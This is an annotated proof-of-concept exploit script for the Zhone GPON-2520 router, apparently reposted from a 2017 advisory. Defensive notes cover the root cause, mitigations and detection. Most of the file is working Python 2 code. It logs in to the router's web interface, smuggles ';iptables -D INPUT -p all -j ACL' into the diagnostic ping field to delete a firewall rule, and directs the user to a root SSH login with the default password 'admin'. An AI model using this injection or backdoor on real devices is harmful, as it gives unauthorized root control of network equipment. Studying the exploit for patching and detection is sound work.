Command Execution and Backdoor in Zhone GPON-252

a guest
Jun 21st, 2017
# http://websec.ca/advisories/view/Zhone-GPON-2520-remote-root-shell-backdoor
#
# Proof-of-concept published alongside the advisory linked above.  It logs in
# to the router's web UI and then submits the diagnostic "ping" form with a
# shell metacharacter in the destination field, so the firmware executes an
# extra iptables command.  The code is kept exactly as published; the notes
# below are the defender-side reading of it.
#
# Defensive reading:
#   - Root cause: the diag form's `dest_host` value reaches a shell without
#     validation.  The device-side fix is to validate that field as a
#     hostname/IP address and never pass it to a shell.
#   - Preconditions: valid web-UI credentials and network reachability of the
#     management interface.  Keeping the admin UI off the WAN side and changing
#     factory-default passwords removes both.
#   - Detection: an HTTP POST to /GponForm/diag_ZForm whose `dest_host` value
#     contains `;` (or other shell metacharacters), followed by an SSH login
#     as root, is the observable pattern of this script.
#
# Code-quality notes (deliberately NOT fixed here):
#   - Python 2 only (print statements); `httplib2` is a third-party package.
#   - The usage text names two arguments, but argv[1..3] are host, user, pass.
#   - `content.find("")` always returns 0, so `result < 0` is never true and
#     the "[-] Authentication failed" branch is unreachable: success is printed
#     whether or not the login worked.
#   - The HTTP response objects (`resp`) are never inspected; `time` is
#     imported but unused; credentials are echoed to stdout.
 
#!/usr/bin/python2
from httplib2 import Http
from urllib import urlencode
import sys,time
 
# main function
# Only the argument check lives under the guard; everything below it runs at
# import time as well.
if __name__ == "__main__":
    if (len(sys.argv) != 4):
        print '*********************************************************************************'
        print ' GPON Zhone R4.0.2.566b RCE & Backdoor'
        print ' Tested on'
        print ' GPON Zhone 2520'
        print ' Hardware: 0040-48-02'
        print ' Software: R4.0.2.566b'
        print ' '
        # NOTE: the usage line omits the first positional argument (the host);
        # the example on the next line shows the actual order: host user pass.
        print ' Usage : python', sys.argv[0] + ' <web_user> <web_pass>'
        print ' Ex : python',sys.argv[0] + ' 192.168.15.1 root admin'
        print ' Author : Kaczinski lramirez@websec.mx '
        print ' URL : http://www.websec.mx/advisories'
        print '*********************************************************************************'
        sys.exit()
 
# Positional arguments: router address, web-UI user name, web-UI password.
HOST = sys.argv[1]
USER = sys.argv[2]
PASS = sys.argv[3]
 
print '*********************************************************************************'
print '[+] Logging in to the router: '+ HOST
print '[+] User: '+USER
# The password is written to stdout in clear text.
print '[+] Pass: '+PASS
 
# httplib2 client; redirects are followed so the post-login page is fetched.
h = Http()
h.follow_redirects = True
# Form fields for the web UI login endpoint.
data = dict(XWebPageName="index", username=USER, password=PASS)
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
# find("") is always 0 (the empty string matches at offset 0), so this is not
# a real login check -- see the notes at the top of the file.
result = content.find("")
 
if result < 0:
    # Unreachable with the check above.
    print '[-] Authentication failed'
    print '*********************************************************************************'
else:
    print '[+] Authentication succeeded'
    print '[+] Deleting the firewall rule that blocks SSH'
    # Injection point: `dest_host` is the diagnostic ping target.  The leading
    # `;` ends whatever command the firmware builds around it, and the rest
    # removes an INPUT-chain rule so that SSH is no longer filtered.
    data = dict(XWebPageName="diag", dest_host=";iptables -D INPUT -p all -j ACL", wan_conlist="default", diag_action="ping")
    resp, content = h.request("http://" + HOST + "/GponForm/diag_ZForm", "POST", urlencode(data))
    # The response is not checked; the script assumes the command ran.
    print '[+] The firewall rule should have been disabled, please ssh root@' + HOST + ' using admin as password to get your root shell :)'
    print '[+] Done'
    # Ends the web session.
    resp, content = h.request("http://" + HOST + "/logout.html", "GET")
 
sys.exit()